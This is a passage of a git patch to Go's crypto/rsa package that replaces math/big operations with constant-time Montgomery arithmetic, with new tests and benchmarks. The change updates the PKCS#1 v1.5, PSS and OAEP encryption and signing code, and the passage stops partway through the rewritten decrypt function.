++// modAdd computes x = x + y mod m.
++//
++// The length of both operands must be the same as the modulus. Both operands
++// must already be reduced modulo m.
++func (x *nat) modAdd(y *nat, m *modulus) *nat {
++ overflow := x.add(yes, y)
++ underflow := not(x.cmpGeq(m.nat)) // x < m
++
++ // Three cases are possible:
++ //
++ // - overflow = 0, underflow = 0
++ //
++ // In this case, addition fits in our limbs, but we can still subtract away
++ // m without an underflow, so we need to perform the subtraction to reduce
++ // our result.
++ //
++ // - overflow = 0, underflow = 1
++ //
++ // The addition fits in our limbs, but we can't subtract m without
++ // underflowing. The result is already reduced.
++ //
++ // - overflow = 1, underflow = 1
++ //
++ // The addition does not fit in our limbs, and the subtraction's borrow
++ // would cancel out with the addition's carry. We need to subtract m to
++ // reduce our result.
++ //
++ // The overflow = 1, underflow = 0 case is not possible, because y is at
++ // most m - 1, and if adding m - 1 overflows, then subtracting m must
++ // necessarily underflow.
++ needSubtraction := ctEq(overflow, uint(underflow))
++
++ x.sub(needSubtraction, m.nat)
++ return x
++}
++
++// montgomeryRepresentation calculates x = x * R mod m, with R = 2^(_W * n) and
++// n = len(m.nat.limbs).
++//
++// Faster Montgomery multiplication replaces standard modular multiplication for
++// numbers in this representation.
++//
++// This assumes that x is already reduced mod m.
++func (x *nat) montgomeryRepresentation(m *modulus) *nat {
++ for i := 0; i < len(m.nat.limbs); i++ {
++ x.shiftIn(0, m) // x = x * 2^_W mod m
++ }
++ return x
++}
++
++// montgomeryMul calculates d = a * b / R mod m, with R = 2^(_W * n) and
++// n = len(m.nat.limbs), using the Montgomery Multiplication technique.
++//
++// All inputs should be the same length, not aliasing d, and already
++// reduced modulo m. d will be resized to the size of m and overwritten.
++func (d *nat) montgomeryMul(a *nat, b *nat, m *modulus) *nat {
++ // See https://bearssl.org/bigint.html#montgomery-reduction-and-multiplication
++ // for a description of the algorithm.
++
++ // Eliminate bounds checks in the loop.
++ size := len(m.nat.limbs)
++ aLimbs := a.limbs[:size]
++ bLimbs := b.limbs[:size]
++ dLimbs := d.resetFor(m).limbs[:size]
++ mLimbs := m.nat.limbs[:size]
++
++ var overflow uint
++ for i := 0; i < size; i++ {
++ f := ((dLimbs[0] + aLimbs[i]*bLimbs[0]) * m.m0inv) & _MASK
++ carry := uint(0)
++ for j := 0; j < size; j++ {
++ // z = d[j] + a[i] * b[j] + f * m[j] + carry <= 2^(2W+1) - 2^(W+1) + 2^W
++ hi, lo := bits.Mul(aLimbs[i], bLimbs[j])
++ z_lo, c := bits.Add(dLimbs[j], lo, 0)
++ z_hi, _ := bits.Add(0, hi, c)
++ hi, lo = bits.Mul(f, mLimbs[j])
++ z_lo, c = bits.Add(z_lo, lo, 0)
++ z_hi, _ = bits.Add(z_hi, hi, c)
++ z_lo, c = bits.Add(z_lo, carry, 0)
++ z_hi, _ = bits.Add(z_hi, 0, c)
++ if j > 0 {
++ dLimbs[j-1] = z_lo & _MASK
++ }
++ carry = z_hi<<1 | z_lo>>_W // carry <= 2^(W+1) - 2
++ }
++ z := overflow + carry // z <= 2^(W+1) - 1
++ dLimbs[size-1] = z & _MASK
++ overflow = z >> _W // overflow <= 1
++ }
++ // See modAdd for how overflow, underflow, and needSubtraction relate.
++ underflow := not(d.cmpGeq(m.nat)) // d < m
++ needSubtraction := ctEq(overflow, uint(underflow))
++ d.sub(needSubtraction, m.nat)
++
++ return d
++}
++
++// modMul calculates x *= y mod m.
++//
++// x and y must already be reduced modulo m, they must share its announced
++// length, and they may not alias.
++func (x *nat) modMul(y *nat, m *modulus) *nat {
++ // A Montgomery multiplication by a value out of the Montgomery domain
++ // takes the result out of Montgomery representation.
++ xR := x.clone().montgomeryRepresentation(m) // xR = x * R mod m
++ return x.montgomeryMul(xR, y, m) // x = xR * y / R mod m
++}
++
++// exp calculates out = x^e mod m.
++//
++// The exponent e is represented in big-endian order. The output will be resized
++// to the size of m and overwritten. x must already be reduced modulo m.
++func (out *nat) exp(x *nat, e []byte, m *modulus) *nat {
++ // We use a 4 bit window. For our RSA workload, 4 bit windows are faster
++ // than 2 bit windows, but use an extra 12 nats worth of scratch space.
++ // Using bit sizes that don't divide 8 is more complex to implement.
++ table := make([]*nat, (1<<4)-1) // table[i] = x ^ (i+1)
++ table[0] = x.clone().montgomeryRepresentation(m)
++ for i := 1; i < len(table); i++ {
++ table[i] = new(nat).expandFor(m)
++ table[i].montgomeryMul(table[i-1], table[0], m)
++ }
++
++ out.resetFor(m)
++ out.limbs[0] = 1
++ out.montgomeryRepresentation(m)
++ t0 := new(nat).expandFor(m)
++ t1 := new(nat).expandFor(m)
++ for _, b := range e {
++ for _, j := range []int{4, 0} {
++ // Square four times.
++ t1.montgomeryMul(out, out, m)
++ out.montgomeryMul(t1, t1, m)
++ t1.montgomeryMul(out, out, m)
++ out.montgomeryMul(t1, t1, m)
++
++ // Select x^k in constant time from the table.
++ k := uint((b >> j) & 0b1111)
++ for i := range table {
++ t0.assign(ctEq(k, uint(i+1)), table[i])
++ }
++
++ // Multiply by x^k, discarding the result if k = 0.
++ t1.montgomeryMul(out, t0, m)
++ out.assign(not(ctEq(k, 0)), t1)
++ }
++ }
++
++ // By Montgomery multiplying with 1 not in Montgomery representation, we
++ // convert out back from Montgomery representation, because it works out to
++ // dividing by R.
++ t0.assign(yes, out)
++ t1.resetFor(m)
++ t1.limbs[0] = 1
++ out.montgomeryMul(t0, t1, m)
++
++ return out
++}
+diff --git a/src/crypto/rsa/nat_test.go b/src/crypto/rsa/nat_test.go
+new file mode 100644
+index 0000000..3e6eb10
+--- /dev/null
++++ b/src/crypto/rsa/nat_test.go
+@@ -0,0 +1,384 @@
++// Copyright 2021 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++
++package rsa
++
++import (
++ "bytes"
++ "math/big"
++ "math/bits"
++ "math/rand"
++ "reflect"
++ "testing"
++ "testing/quick"
++)
++
++// Generate generates an even nat. It's used by testing/quick to produce random
++// *nat values for quick.Check invocations.
++func (*nat) Generate(r *rand.Rand, size int) reflect.Value {
++ limbs := make([]uint, size)
++ for i := 0; i < size; i++ {
++ limbs[i] = uint(r.Uint64()) & ((1 << _W) - 2)
++ }
++ return reflect.ValueOf(&nat{limbs})
++}
++
++func testModAddCommutative(a *nat, b *nat) bool {
++ mLimbs := make([]uint, len(a.limbs))
++ for i := 0; i < len(mLimbs); i++ {
++ mLimbs[i] = _MASK
++ }
++ m := modulusFromNat(&nat{mLimbs})
++ aPlusB := a.clone()
++ aPlusB.modAdd(b, m)
++ bPlusA := b.clone()
++ bPlusA.modAdd(a, m)
++ return aPlusB.cmpEq(bPlusA) == 1
++}
++
++func TestModAddCommutative(t *testing.T) {
++ err := quick.Check(testModAddCommutative, &quick.Config{})
++ if err != nil {
++ t.Error(err)
++ }
++}
++
++func testModSubThenAddIdentity(a *nat, b *nat) bool {
++ mLimbs := make([]uint, len(a.limbs))
++ for i := 0; i < len(mLimbs); i++ {
++ mLimbs[i] = _MASK
++ }
++ m := modulusFromNat(&nat{mLimbs})
++ original := a.clone()
++ a.modSub(b, m)
++ a.modAdd(b, m)
++ return a.cmpEq(original) == 1
++}
++
++func TestModSubThenAddIdentity(t *testing.T) {
++ err := quick.Check(testModSubThenAddIdentity, &quick.Config{})
++ if err != nil {
++ t.Error(err)
++ }
++}
++
++func testMontgomeryRoundtrip(a *nat) bool {
++ one := &nat{make([]uint, len(a.limbs))}
++ one.limbs[0] = 1
++ aPlusOne := a.clone()
++ aPlusOne.add(1, one)
++ m := modulusFromNat(aPlusOne)
++ monty := a.clone()
++ monty.montgomeryRepresentation(m)
++ aAgain := monty.clone()
++ aAgain.montgomeryMul(monty, one, m)
++ return a.cmpEq(aAgain) == 1
++}
++
++func TestMontgomeryRoundtrip(t *testing.T) {
++ err := quick.Check(testMontgomeryRoundtrip, &quick.Config{})
++ if err != nil {
++ t.Error(err)
++ }
++}
++
++func TestFromBig(t *testing.T) {
++ expected := []byte{0x01, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff}
++ theBig := new(big.Int).SetBytes(expected)
++ actual := natFromBig(theBig).fillBytes(make([]byte, len(expected)))
++ if !bytes.Equal(actual, expected) {
++ t.Errorf("%+x != %+x", actual, expected)
++ }
++}
++
++func TestFillBytes(t *testing.T) {
++ xBytes := []byte{0xAA, 0xFF, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88}
++ x := natFromBytes(xBytes)
++ for l := 20; l >= len(xBytes); l-- {
++ buf := make([]byte, l)
++ rand.Read(buf)
++ actual := x.fillBytes(buf)
++ expected := make([]byte, l)
++ copy(expected[l-len(xBytes):], xBytes)
++ if !bytes.Equal(actual, expected) {
++ t.Errorf("%d: %+v != %+v", l, actual, expected)
++ }
++ }
++ for l := len(xBytes) - 1; l >= 0; l-- {
++ (func() {
++ defer func() {
++ if recover() == nil {
++ t.Errorf("%d: expected panic", l)
++ }
++ }()
++ x.fillBytes(make([]byte, l))
++ })()
++ }
++}
++
++func TestFromBytes(t *testing.T) {
++ f := func(xBytes []byte) bool {
++ if len(xBytes) == 0 {
++ return true
++ }
++ actual := natFromBytes(xBytes).fillBytes(make([]byte, len(xBytes)))
++ if !bytes.Equal(actual, xBytes) {
++ t.Errorf("%+x != %+x", actual, xBytes)
++ return false
++ }
++ return true
++ }
++
++ err := quick.Check(f, &quick.Config{})
++ if err != nil {
++ t.Error(err)
++ }
++
++ f([]byte{0xFF, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88})
++ f(bytes.Repeat([]byte{0xFF}, _W))
++}
++
++func TestShiftIn(t *testing.T) {
++ if bits.UintSize != 64 {
++ t.Skip("examples are only valid in 64 bit")
++ }
++ examples := []struct {
++ m, x, expected []byte
++ y uint64
++ }{{
++ m: []byte{13},
++ x: []byte{0},
++ y: 0x7FFF_FFFF_FFFF_FFFF,
++ expected: []byte{7},
++ }, {
++ m: []byte{13},
++ x: []byte{7},
++ y: 0x7FFF_FFFF_FFFF_FFFF,
++ expected: []byte{11},
++ }, {
++ m: []byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d},
++ x: make([]byte, 9),
++ y: 0x7FFF_FFFF_FFFF_FFFF,
++ expected: []byte{0x00, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
++ }, {
++ m: []byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d},
++ x: []byte{0x00, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
++ y: 0,
++ expected: []byte{0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08},
++ }}
++
++ for i, tt := range examples {
++ m := modulusFromNat(natFromBytes(tt.m))
++ got := natFromBytes(tt.x).expandFor(m).shiftIn(uint(tt.y), m)
++ if got.cmpEq(natFromBytes(tt.expected).expandFor(m)) != 1 {
++ t.Errorf("%d: got %x, expected %x", i, got, tt.expected)
++ }
++ }
++}
++
++func TestModulusAndNatSizes(t *testing.T) {
++ // These are 126 bit (2 * _W on 64-bit architectures) values, serialized as
++ // 128 bits worth of bytes. If leading zeroes are stripped, they fit in two
++ // limbs, if they are not, they fit in three. This can be a problem because
++ // modulus strips leading zeroes and nat does not.
++ m := modulusFromNat(natFromBytes([]byte{
++ 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
++ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff}))
++ x := natFromBytes([]byte{
++ 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
++ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe})
++ x.expandFor(m) // must not panic for shrinking
++}
++
++func TestExpand(t *testing.T) {
++ sliced := []uint{1, 2, 3, 4}
++ examples := []struct {
++ in []uint
++ n int
++ out []uint
++ }{{
++ []uint{1, 2},
++ 4,
++ []uint{1, 2, 0, 0},
++ }, {
++ sliced[:2],
++ 4,
++ []uint{1, 2, 0, 0},
++ }, {
++ []uint{1, 2},
++ 2,
++ []uint{1, 2},
++ }, {
++ []uint{1, 2, 0},
++ 2,
++ []uint{1, 2},
++ }}
++
++ for i, tt := range examples {
++ got := (&nat{tt.in}).expand(tt.n)
++ if len(got.limbs) != len(tt.out) || got.cmpEq(&nat{tt.out}) != 1 {
++ t.Errorf("%d: got %x, expected %x", i, got, tt.out)
++ }
++ }
++}
++
++func TestMod(t *testing.T) {
++ m := modulusFromNat(natFromBytes([]byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d}))
++ x := natFromBytes([]byte{0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01})
++ out := new(nat)
++ out.mod(x, m)
++ expected := natFromBytes([]byte{0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09})
++ if out.cmpEq(expected) != 1 {
++ t.Errorf("%+v != %+v", out, expected)
++ }
++}
++
++func TestModSub(t *testing.T) {
++ m := modulusFromNat(&nat{[]uint{13}})
++ x := &nat{[]uint{6}}
++ y := &nat{[]uint{7}}
++ x.modSub(y, m)
++ expected := &nat{[]uint{12}}
++ if x.cmpEq(expected) != 1 {
++ t.Errorf("%+v != %+v", x, expected)
++ }
++ x.modSub(y, m)
++ expected = &nat{[]uint{5}}
++ if x.cmpEq(expected) != 1 {
++ t.Errorf("%+v != %+v", x, expected)
++ }
++}
++
++func TestModAdd(t *testing.T) {
++ m := modulusFromNat(&nat{[]uint{13}})
++ x := &nat{[]uint{6}}
++ y := &nat{[]uint{7}}
++ x.modAdd(y, m)
++ expected := &nat{[]uint{0}}
++ if x.cmpEq(expected) != 1 {
++ t.Errorf("%+v != %+v", x, expected)
++ }
++ x.modAdd(y, m)
++ expected = &nat{[]uint{7}}
++ if x.cmpEq(expected) != 1 {
++ t.Errorf("%+v != %+v", x, expected)
++ }
++}
++
++func TestExp(t *testing.T) {
++ m := modulusFromNat(&nat{[]uint{13}})
++ x := &nat{[]uint{3}}
++ out := &nat{[]uint{0}}
++ out.exp(x, []byte{12}, m)
++ expected := &nat{[]uint{1}}
++ if out.cmpEq(expected) != 1 {
++ t.Errorf("%+v != %+v", out, expected)
++ }
++}
++
++func makeBenchmarkModulus() *modulus {
++ m := make([]uint, 32)
++ for i := 0; i < 32; i++ {
++ m[i] = _MASK
++ }
++ return modulusFromNat(&nat{limbs: m})
++}
++
++func makeBenchmarkValue() *nat {
++ x := make([]uint, 32)
++ for i := 0; i < 32; i++ {
++ x[i] = _MASK - 1
++ }
++ return &nat{limbs: x}
++}
++
++func makeBenchmarkExponent() []byte {
++ e := make([]byte, 256)
++ for i := 0; i < 32; i++ {
++ e[i] = 0xFF
++ }
++ return e
++}
++
++func BenchmarkModAdd(b *testing.B) {
++ x := makeBenchmarkValue()
++ y := makeBenchmarkValue()
++ m := makeBenchmarkModulus()
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ x.modAdd(y, m)
++ }
++}
++
++func BenchmarkModSub(b *testing.B) {
++ x := makeBenchmarkValue()
++ y := makeBenchmarkValue()
++ m := makeBenchmarkModulus()
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ x.modSub(y, m)
++ }
++}
++
++func BenchmarkMontgomeryRepr(b *testing.B) {
++ x := makeBenchmarkValue()
++ m := makeBenchmarkModulus()
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ x.montgomeryRepresentation(m)
++ }
++}
++
++func BenchmarkMontgomeryMul(b *testing.B) {
++ x := makeBenchmarkValue()
++ y := makeBenchmarkValue()
++ out := makeBenchmarkValue()
++ m := makeBenchmarkModulus()
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ out.montgomeryMul(x, y, m)
++ }
++}
++
++func BenchmarkModMul(b *testing.B) {
++ x := makeBenchmarkValue()
++ y := makeBenchmarkValue()
++ m := makeBenchmarkModulus()
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ x.modMul(y, m)
++ }
++}
++
++func BenchmarkExpBig(b *testing.B) {
++ out := new(big.Int)
++ exponentBytes := makeBenchmarkExponent()
++ x := new(big.Int).SetBytes(exponentBytes)
++ e := new(big.Int).SetBytes(exponentBytes)
++ n := new(big.Int).SetBytes(exponentBytes)
++ one := new(big.Int).SetUint64(1)
++ n.Add(n, one)
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ out.Exp(x, e, n)
++ }
++}
++
++func BenchmarkExp(b *testing.B) {
++ x := makeBenchmarkValue()
++ e := makeBenchmarkExponent()
++ out := makeBenchmarkValue()
++ m := makeBenchmarkModulus()
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ out.exp(x, e, m)
++ }
++}
+diff --git a/src/crypto/rsa/pkcs1v15.go b/src/crypto/rsa/pkcs1v15.go
+index a216be3..ce89f92 100644
+--- a/src/crypto/rsa/pkcs1v15.go
++++ b/src/crypto/rsa/pkcs1v15.go
+@@ -9,7 +9,6 @@ import (
+ "crypto/subtle"
+ "errors"
+ "io"
+- "math/big"
+
+ "crypto/internal/randutil"
+ )
+@@ -58,14 +57,11 @@ func EncryptPKCS1v15(rand io.Reader, pub *PublicKey, msg []byte) ([]byte, error)
+ em[len(em)-len(msg)-1] = 0
+ copy(mm, msg)
+
+- m := new(big.Int).SetBytes(em)
+- c := encrypt(new(big.Int), pub, m)
+-
+- return c.FillBytes(em), nil
++ return encrypt(pub, em), nil
+ }
+
+ // DecryptPKCS1v15 decrypts a plaintext using RSA and the padding scheme from PKCS#1 v1.5.
+-// If rand != nil, it uses RSA blinding to avoid timing side-channel attacks.
++// The rand parameter is legacy and ignored, and it can be nil.
+ //
+ // Note that whether this function returns an error or not discloses secret
+ // information. If an attacker can cause this function to run repeatedly and
+@@ -76,7 +72,7 @@ func DecryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) ([]byt
+ if err := checkPub(&priv.PublicKey); err != nil {
+ return nil, err
+ }
+- valid, out, index, err := decryptPKCS1v15(rand, priv, ciphertext)
++ valid, out, index, err := decryptPKCS1v15(priv, ciphertext)
+ if err != nil {
+ return nil, err
+ }
+@@ -87,7 +83,7 @@ func DecryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) ([]byt
+ }
+
+ // DecryptPKCS1v15SessionKey decrypts a session key using RSA and the padding scheme from PKCS#1 v1.5.
+-// If rand != nil, it uses RSA blinding to avoid timing side-channel attacks.
++// The rand parameter is legacy and ignored, and it can be nil.
+ // It returns an error if the ciphertext is the wrong length or if the
+ // ciphertext is greater than the public modulus. Otherwise, no error is
+ // returned. If the padding is valid, the resulting plaintext message is copied
+@@ -114,7 +110,7 @@ func DecryptPKCS1v15SessionKey(rand io.Reader, priv *PrivateKey, ciphertext []by
+ return ErrDecryption
+ }
+
+- valid, em, index, err := decryptPKCS1v15(rand, priv, ciphertext)
++ valid, em, index, err := decryptPKCS1v15(priv, ciphertext)
+ if err != nil {
+ return err
+ }
+@@ -130,26 +126,24 @@ func DecryptPKCS1v15SessionKey(rand io.Reader, priv *PrivateKey, ciphertext []by
+ return nil
+ }
+
+-// decryptPKCS1v15 decrypts ciphertext using priv and blinds the operation if
+-// rand is not nil. It returns one or zero in valid that indicates whether the
+-// plaintext was correctly structured. In either case, the plaintext is
+-// returned in em so that it may be read independently of whether it was valid
+-// in order to maintain constant memory access patterns. If the plaintext was
+-// valid then index contains the index of the original message in em.
+-func decryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) (valid int, em []byte, index int, err error) {
++// decryptPKCS1v15 decrypts ciphertext using priv. It returns one or zero in
++// valid that indicates whether the plaintext was correctly structured.
++// In either case, the plaintext is returned in em so that it may be read
++// independently of whether it was valid in order to maintain constant memory
++// access patterns. If the plaintext was valid then index contains the index of
++// the original message in em, to allow constant time padding removal.
++func decryptPKCS1v15(priv *PrivateKey, ciphertext []byte) (valid int, em []byte, index int, err error) {
+ k := priv.Size()
+ if k < 11 {
+ err = ErrDecryption
+ return
+ }
+
+- c := new(big.Int).SetBytes(ciphertext)
+- m, err := decrypt(rand, priv, c)
++ em, err = decrypt(priv, ciphertext)
+ if err != nil {
+ return
+ }
+
+- em = m.FillBytes(make([]byte, k))
+ firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
+ secondByteIsTwo := subtle.ConstantTimeByteEq(em[1], 2)
+
+@@ -221,8 +215,7 @@ var hashPrefixes = map[crypto.Hash][]byte{
+ // function. If hash is zero, hashed is signed directly. This isn't
+ // advisable except for interoperability.
+ //
+-// If rand is not nil then RSA blinding will be used to avoid timing
+-// side-channel attacks.
++// The rand parameter is legacy and ignored, and it can be nil.
+ //
+ // This function is deterministic. Thus, if the set of possible
+ // messages is small, an attacker may be able to build a map from
+@@ -249,13 +242,7 @@ func SignPKCS1v15(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed []b
+ copy(em[k-tLen:k-hashLen], prefix)
+ copy(em[k-hashLen:k], hashed)
+
+- m := new(big.Int).SetBytes(em)
+- c, err := decryptAndCheck(rand, priv, m)
+- if err != nil {
+- return nil, err
+- }
+-
+- return c.FillBytes(em), nil
++ return decryptAndCheck(priv, em)
+ }
+
+ // VerifyPKCS1v15 verifies an RSA PKCS#1 v1.5 signature.
+@@ -275,9 +262,7 @@ func VerifyPKCS1v15(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte)
+ return ErrVerification
+ }
+
+- c := new(big.Int).SetBytes(sig)
+- m := encrypt(new(big.Int), pub, c)
+- em := m.FillBytes(make([]byte, k))
++ em := encrypt(pub, sig)
+ // EM = 0x00 || 0x01 || PS || 0x00 || T
+
+ ok := subtle.ConstantTimeByteEq(em[0], 0)
+diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
+index 814522d..eaba4be 100644
+--- a/src/crypto/rsa/pss.go
++++ b/src/crypto/rsa/pss.go
+@@ -12,7 +12,6 @@ import (
+ "errors"
+ "hash"
+ "io"
+- "math/big"
+ )
+
+ // Per RFC 8017, Section 9.1
+@@ -207,19 +206,27 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
+ // Note that hashed must be the result of hashing the input message using the
+ // given hash function. salt is a random sequence of bytes whose length will be
+ // later used to verify the signature.
+-func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) ([]byte, error) {
+- emBits := priv.N.BitLen() - 1
++func signPSSWithSalt(priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) ([]byte, error) {
++ emBits := bigBitLen(priv.N) - 1
+ em, err := emsaPSSEncode(hashed, emBits, salt, hash.New())
+ if err != nil {
+ return nil, err
+ }
+- m := new(big.Int).SetBytes(em)
+- c, err := decryptAndCheck(rand, priv, m)
+- if err != nil {
+- return nil, err
++
++ // RFC 8017: "Note that the octet length of EM will be one less than k if
++ // modBits - 1 is divisible by 8 and equal to k otherwise, where k is the
++ // length in octets of the RSA modulus n."
++ //
++ // This is extremely annoying, as all other encrypt and decrypt inputs are
++ // always the exact same size as the modulus. Since it only happens for
++ // weird modulus sizes, fix it by padding inefficiently.
++ if emLen, k := len(em), priv.Size(); emLen < k {
++ emNew := make([]byte, k)
++ copy(emNew[k-emLen:], em)
++ em = emNew
+ }
+- s := make([]byte, priv.Size())
+- return c.FillBytes(s), nil
++
++ return decryptAndCheck(priv, em)
+ }
+
+ const (
+@@ -269,7 +276,7 @@ func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte,
+ saltLength := opts.saltLength()
+ switch saltLength {
+ case PSSSaltLengthAuto:
+- saltLength = (priv.N.BitLen()-1+7)/8 - 2 - hash.Size()
++ saltLength = (bigBitLen(priv.N)-1+7)/8 - 2 - hash.Size()
+ case PSSSaltLengthEqualsHash:
+ saltLength = hash.Size()
+ }
+@@ -278,7 +285,7 @@ func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte,
+ if _, err := io.ReadFull(rand, salt); err != nil {
+ return nil, err
+ }
+- return signPSSWithSalt(rand, priv, hash, digest, salt)
++ return signPSSWithSalt(priv, hash, digest, salt)
+ }
+
+ // VerifyPSS verifies a PSS signature.
+@@ -291,13 +298,22 @@ func VerifyPSS(pub *PublicKey, hash crypto.Hash, digest []byte, sig []byte, opts
+ if len(sig) != pub.Size() {
+ return ErrVerification
+ }
+- s := new(big.Int).SetBytes(sig)
+- m := encrypt(new(big.Int), pub, s)
+- emBits := pub.N.BitLen() - 1
++
++ emBits := bigBitLen(pub.N) - 1
+ emLen := (emBits + 7) / 8
+- if m.BitLen() > emLen*8 {
+- return ErrVerification
++ em := encrypt(pub, sig)
++
++ // Like in signPSSWithSalt, deal with mismatches between emLen and the size
++ // of the modulus. The spec would have us wire emLen into the encoding
++ // function, but we'd rather always encode to the size of the modulus and
++ // then strip leading zeroes if necessary. This only happens for weird
++ // modulus sizes anyway.
++ for len(em) > emLen && len(em) > 0 {
++ if em[0] != 0 {
++ return ErrVerification
++ }
++ em = em[1:]
+ }
+- em := m.FillBytes(make([]byte, emLen))
++
+ return emsaPSSVerify(digest, em, emBits, opts.saltLength(), hash.New())
+ }
+diff --git a/src/crypto/rsa/pss_test.go b/src/crypto/rsa/pss_test.go
+index c3a6d46..d018b43 100644
+--- a/src/crypto/rsa/pss_test.go
++++ b/src/crypto/rsa/pss_test.go
+@@ -233,7 +233,10 @@ func TestPSSSigning(t *testing.T) {
+ }
+ }
+
+-func TestSignWithPSSSaltLengthAuto(t *testing.T) {
++func TestPSS513(t *testing.T) {
++ // See Issue 42741, and separately, RFC 8017: "Note that the octet length of
++ // EM will be one less than k if modBits - 1 is divisible by 8 and equal to
++ // k otherwise, where k is the length in octets of the RSA modulus n."
+ key, err := GenerateKey(rand.Reader, 513)
+ if err != nil {
+ t.Fatal(err)
+@@ -246,8 +249,9 @@ func TestSignWithPSSSaltLengthAuto(t *testing.T) {
+ if err != nil {
+ t.Fatal(err)
+ }
+- if len(signature) == 0 {
+- t.Fatal("empty signature returned")
++ err = VerifyPSS(&key.PublicKey, crypto.SHA256, digest[:], signature, nil)
++ if err != nil {
++ t.Error(err)
+ }
+ }
+
+diff --git a/src/crypto/rsa/rsa.go b/src/crypto/rsa/rsa.go
+index 5a00ed2..29d9d31 100644
+--- a/src/crypto/rsa/rsa.go
++++ b/src/crypto/rsa/rsa.go
+@@ -19,13 +19,17 @@
+ // over the public key primitive, the PrivateKey type implements the
+ // Decrypter and Signer interfaces from the crypto package.
+ //
+-// The RSA operations in this package are not implemented using constant-time algorithms.
++// Operations in this package are implemented using constant-time algorithms,
++// except for [GenerateKey], [PrivateKey.Precompute], and [PrivateKey.Validate].
++// Every other operation only leaks the bit size of the involved values, which
++// all depend on the selected key size.
+ package rsa
+
+ import (
+ "crypto"
+ "crypto/rand"
+ "crypto/subtle"
++ "encoding/binary"
+ "errors"
+ "hash"
+ "io"
+@@ -35,7 +39,6 @@ import (
+ "crypto/internal/randutil"
+ )
+
+-var bigZero = big.NewInt(0)
+ var bigOne = big.NewInt(1)
+
+ // A PublicKey represents the public part of an RSA key.
+@@ -47,7 +50,7 @@ type PublicKey struct {
+ // Size returns the modulus size in bytes. Raw signatures and ciphertexts
+ // for or by this public key will have the same size.
+ func (pub *PublicKey) Size() int {
+- return (pub.N.BitLen() + 7) / 8
++ return (bigBitLen(pub.N) + 7) / 8
+ }
+
+ // OAEPOptions is an interface for passing options to OAEP decryption using the
+@@ -351,10 +354,19 @@ func mgf1XOR(out []byte, hash hash.Hash, seed []byte) {
+ // too large for the size of the public key.
+ var ErrMessageTooLong = errors.New("crypto/rsa: message too long for RSA public key size")
+
+-func encrypt(c *big.Int, pub *PublicKey, m *big.Int) *big.Int {
+- e := big.NewInt(int64(pub.E))
+- c.Exp(m, e, pub.N)
+- return c
++func encrypt(pub *PublicKey, plaintext []byte) []byte {
++
++ N := modulusFromNat(natFromBig(pub.N))
++ m := natFromBytes(plaintext).expandFor(N)
++
++ e := make([]byte, 8)
++ binary.BigEndian.PutUint64(e, uint64(pub.E))
++ for len(e) > 1 && e[0] == 0 {
++ e = e[1:]
++ }
++
++ out := make([]byte, modulusSize(N))
++ return new(nat).exp(m, e, N).fillBytes(out)
+ }
+
+ // EncryptOAEP encrypts the given message with RSA-OAEP.
+@@ -404,12 +416,7 @@ func EncryptOAEP(hash hash.Hash, random io.Reader, pub *PublicKey, msg []byte, l
+ mgf1XOR(db, hash, seed)
+ mgf1XOR(seed, hash, db)
+
+- m := new(big.Int)
+- m.SetBytes(em)
+- c := encrypt(new(big.Int), pub, m)
+-
+- out := make([]byte, k)
+- return c.FillBytes(out), nil
++ return encrypt(pub, em), nil
+ }
+
+ // ErrDecryption represents a failure to decrypt a message.
+@@ -451,98 +458,71 @@ func (priv *PrivateKey) Precompute() {
+ }
+ }
+
+-// decrypt performs an RSA decryption, resulting in a plaintext integer. If a
+-// random source is given, RSA blinding is used.
+-func decrypt(random io.Reader, priv *PrivateKey, c *big.Int) (m *big.Int, err error) {
+- // TODO(agl): can we get away with reusing blinds?
+- if c.Cmp(priv.N) > 0 {
+- err = ErrDecryption
+- return
++// decrypt performs an RSA decryption of ciphertext into out.
++func decrypt(priv *PrivateKey, ciphertext []byte) ([]byte, error) {
++
++ N := modulusFromNat(natFromBig(priv.N))
++ c := natFromBytes(ciphertext).expandFor(N)
++ if c.cmpGeq(N.nat) == 1 {
++ return nil, ErrDecryption
+ }
